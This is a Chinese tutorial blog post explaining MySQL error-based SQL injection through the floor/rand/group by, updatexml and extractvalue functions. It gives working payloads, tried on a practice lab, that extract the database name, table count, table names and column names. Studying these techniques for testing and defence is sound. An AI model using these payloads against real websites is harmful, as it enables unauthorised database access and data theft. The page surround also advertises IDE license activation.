报错注入详解_报错注入的过程

报错注入详解_报错注入的过程报错注入报错注入是SQL注入的一种。利用前提:页面上没有显示位,但是需要输出SQL语句执行错误信息。比如mysql_error()优点:不需要显示位缺点:需要输出mysql_error()的报错信息报错函数1、floor报错注入floor()报错注入是利用count()、rand()、floor()、groupby这几个特定的函数结合在一起产生的注入漏洞,准确的说是floor,count,groupby冲突报错。报错原理:利用数据库表主键不能重复的原理,使用GROUPBY分组,产生主

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE稳定放心使用

报错注入

报错注入是SQL注入的一种。
利用前提:页面上没有显示位,但是需要输出SQL语句执行错误信息。比如mysql_error()
优点:不需要显示位
缺点:需要输出mysql_error()的报错信息

报错函数

1、floor报错注入

floor()报错注入是利用count()、rand()、floor()、group by 这几个特定的函数结合在一起产生的注入漏洞,准确的说是floor,count,group by冲突报错。
报错原理:利用数据库表主键不能重复的原理,使用GROUP BY分组,产生主键冗余,导致报错。

Rand()函数作用如下:
返回[0,1)之间的随机数,用法就是SELECT rand();
在这里插入图片描述
Floor()函数作用如下:
向下取整,用法即SELECT floor(11.332423),结果为11;

简单组合下,可以有SELECT floor(rand()*2);
会发现,产生的是0或1。

加大难度,可以有 SELECT CONCAT((SELECT database()),FLOOR(RAND()*2)), 结果就是security0或security1,这里假设数据库名为security

如果再加上from 表名,则一般会返回security0或security1的一个集合,数目由表本身所含记录数决定。
例如SELECT CONCAT((SELECT database()),FLOOR(RAND()*2)) FROM users;表中存在13各用户,则返回13条。

再加上group by语句,使用information_schema数据库查询表、列信息等,例如:
SELECT CONCAT((SELECT database()),FLOOR(RAND()*2)) as a FROM information_schema.tables group by a;
这样把CONCAT((SELECT database()),FLOOR(RAND()*2))取了个别名a,然后使用它进行分组,这样相同的security0分到一组,security1分到一组,就只剩下两个结果了。

这里的 database()可以替换成任何想查的函数,比如 version(),user(),datadir() 或者其它的查询。
相关文章–>https://blog.csdn.net/zpy1998zpy/article/details/80650540

靶场实战
我们使用靶场进行测试:
暴库名payload:

-1' union select count(*),1,concat((select database()
),floor(rand(0)*2))as a from information_schema.tables group by a --+

在这里插入图片描述
爆表数目

-1' union select 0x7e,count(*),concat((select count(table_name) from information_schema.tables where table_schema='security'),
floor(rand(0)*2))as a from information_schema.tables group by a --+

在这里插入图片描述

爆表名payload

-1' union select count(*),1,concat((select table_name from information_schema.tables where table_schema = 'security' limit 0,1
),floor(rand(0)*2))as a from information_schema.tables group by a --+

在这里插入图片描述
爆列名:

-1' union select 1,count(*),concat((select column_name from information_schema.columns where table_name = 'emails' limit 0,1),floor(rand(0)*2))
as a from information_schema.columns group by a --+

在这里插入图片描述

2、updatexml报错注入

原理:updatexml()函数实际上是去更新了XML文档,但是我们在xml文档路径的位置里面写入了子查询,我们输入特殊字符,然后就因为不符合输入规则然后报错了,但是报错的时候它其实已经执行了那个子查询代码。

updatexml(xml_document,xpath_string,new_value)

第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc1
第二个参数: XPath_string (Xpath格式的字符串),如果不了解Xpath语法,可以在网上查找教程。
第三个参数: new_value,String格式,替换查找到的符合条件的数据。

作用: 改变文档中符合条件的节点的值。
获取数据库:

id=1' and updatexml(0x7e,concat(0x7e,database()),0x7e) --+

在这里插入图片描述
获取表的数量:

id=1' and updatexml(1,concat(0x7e,(select count(table_name) from information_schema.tables where table_schema='security'),0x7e),1) --+

在这里插入图片描述
获取表的名字:

id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1) --+ id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e),1) --+
id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 2,1),0x7e),1) --+ id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1) --+

在这里插入图片描述
获取字段名

id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name = 'users' limit 0,1),0x7e),1) --+

在这里插入图片描述

3、extractvalue报错注入

extractvalue(xml_document,xpath_string)
第一个参数:XML_document是 String 格式,为XMIL文档对象的名称。
第二个参数:XPath_string (Xpath格式的字符串)。
作用: 从目标XML中返回包含所查询值的字符串。
ps: 返回结果限制在32位字符。

爆库名:

id=1' and extractvalue(1,concat(0x7e,database())) --+

在这里插入图片描述
爆表数:

id=1' and extractvalue(1,concat(0x7e,(select count(table_name) from information_schema.tables where table_schema=database()))) --+

在这里插入图片描述
爆表名:

id=1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1))) --+

在这里插入图片描述
爆字段名:

id=1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='emails' limit 0,1))) --+

在这里插入图片描述
宽字节注入移步–>传送门
更多漏洞原理移步–>传送门

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/187473.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)
blank

相关推荐

  • html左侧浮动广告代码,网站侧边栏广告固定浮动效果的实现「建议收藏」

    html左侧浮动广告代码,网站侧边栏广告固定浮动效果的实现「建议收藏」对于页面内容很长的网站来说,经常会出现浏览内容的时候,侧栏已经空了,没内容了,这对于网站广告来说非常可以,如果侧栏空了之后能固定一个广告的话,那样对网站和用户双方的体验都不错,下面就说说具体实现的方法。先在网站加入jquery.js,一般网站都已经加过这个js,因此可以跳过,没有用的网站则需要在网站header部分加入jquery.js代码。之后,编辑侧栏模板,在侧栏最底部加入广告代码,代码如下:…

  • mac 查看redis 版本[通俗易懂]

    mac 查看redis 版本[通俗易懂]redis-server-v

  • 第六章《MySQL查询》

    第六章《MySQL查询》

  • ComponentName的用法

    ComponentName的用法在android应用中打开别的应用我当时第一眼看到的时候是懵逼的,这是个什么玩意开启界面不都是startActivity(intent)的吗?后来才反应过来不是要起自己界面中的Activity

  • mysql数据库总结体会(mysql的发展历史简介)

    一、数据库简介数据库(Database,DB)是按照数据结构来组织,存储和管理数据的仓库。典型特征:数据的结构化、数据间的共享、减少数据的冗余度,数据的独立性。关系型数据库:使用关系模型把数据组织到数据表(table)中。现实世界可以用数据来描述。主流的关系型数据库产品:Oracle(Oracle)、DB2(IBM)、SQLServer(MS)、MySQL(Oracle)。数据表:数…

  • C语言之位运算符_c语言按位取反运算符怎么用

    C语言之位运算符_c语言按位取反运算符怎么用1、在C语言中,位运算符能够针对整数和字符数据的位(bit)进行逻辑与位移的运算,通常区分为“位逻辑运算符”与“位位移运算符”两种。2、位逻辑运算符如下表:运算符 功能 运算过程 & AND(与) 逐位与 | OR(或) 逐位或 ^ XOR(异或) 逐位异或 ~ NOR(非) 逐位非 案例程序如下:#include<stdio.h>#include<stdlib.h&gt…

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号